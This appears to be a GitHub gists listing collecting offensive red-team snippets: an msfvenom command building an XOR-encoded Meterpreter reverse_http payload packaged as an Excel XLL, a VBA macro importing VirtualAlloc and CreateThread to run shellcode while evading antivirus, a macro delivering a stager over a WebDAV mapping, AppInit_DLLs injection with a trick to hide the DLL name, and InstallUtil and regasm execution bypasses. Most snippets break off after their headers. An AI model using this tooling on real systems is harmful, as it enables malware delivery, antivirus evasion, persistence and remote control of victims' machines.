Skip to content

Instantly share code, notes, and snippets.

View PaulSec's full-sized avatar

Paul PaulSec

View GitHub Profile
// Compile with:
// cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
//
// C/CPP code obtained like this:
// 1. Get a raw meterpreter shellcode:
// msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
// 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
// ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor
#include <Windows.h>
@PaulSec
PaulSec / macro_evade_av.vba
Created May 21, 2019 12:22 — forked from Arno0x/macro_evade_av.vba
Load shellcode in macro, from bibliography souce
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long
#End If
@PaulSec
PaulSec / macro_webdav_delivery.vba
Created May 21, 2019 12:22 — forked from Arno0x/macro_webdav_delivery.vba
Office macro using WedDav mapping to deliver payload
'
' Example of DBC2 msbuild.xml stager delivery through a webdav maping
' The stager file (msbuild.xml) can be generated from the DBC2 controller
'
' NOTE:
' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml)
' but it fails miserably for me, so I have to have to first map the drive...
Sub Go()
Dim cmd As String, srv As String
@PaulSec
PaulSec / appinitdllinjection.c
Created May 21, 2019 12:21 — forked from Arno0x/appinitdllinjection.c
AppInit_DLLs injection
// Compile with: cl.exe appinitdllinjection.c /LD /o appinitdllinjection.dll
//
// This DLL can only be injected in a x64 process
//
// Set the registry to automatically load this DLL into 'any' process that is started (at least the ones relying on User32.dll)
// by using the AppInit_DLLs capability:
//
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs = 'path_to_the_dll' (comma or space separated if required)
// One trick with this registry entry is to separate DLLs with an hex '00' (by editing the value in binary) to hide the DLL name
//
@PaulSec
PaulSec / service.cs
Created May 21, 2019 12:21 — forked from Arno0x/service.cs
A basic Windows service written in .Net/c#
/*
Creates a basic Windows Service using .Net framework.
Compile:
c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe service.cs
Create the service with name "Service":
sc create Service type=own binpath= c:\Path\To\service.exe
Start the service:
@PaulSec
PaulSec / detected.cs
Created May 21, 2019 12:21 — forked from Arno0x/detected.cs
Hiding an AV detected assembly into another one
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:detected.exe detected.cs
*/
using System.Diagnostics;
using System.Runtime.InteropServices;
@PaulSec
PaulSec / installUtil.cs
Created May 21, 2019 12:20 — forked from Arno0x/installUtil.cs
Example of a C# DLL to be used with the InstallUtil utility to make it execute some arbitrary code
/*
Author: Arno0x0x, Twitter: @Arno0x0x
===================================== COMPILING =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
===================================== USAGE =====================================
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logtoconsole=false /logfile= /u installUtil.dll
*/
#!/bin/bash
echo "Base64 encoded, ready to be used with 'powershell -e':"
echo "$1" | iconv --to-code UTF-16LE | base64 -w 0
echo
@PaulSec
PaulSec / malicious.cs
Created May 21, 2019 12:19 — forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
/*
Author: Arno0x0x, Twitter: @Arno0x0x
DO NOT COMPILE THIS SOURCE FILE !
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
@PaulSec
PaulSec / regasm.cs
Created May 21, 2019 12:19 — forked from Arno0x/regasm.cs
A DLL that can be called from regasm.exe/regsvc.exe to execute arbitrary code
/*
============== Compile ============
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framewor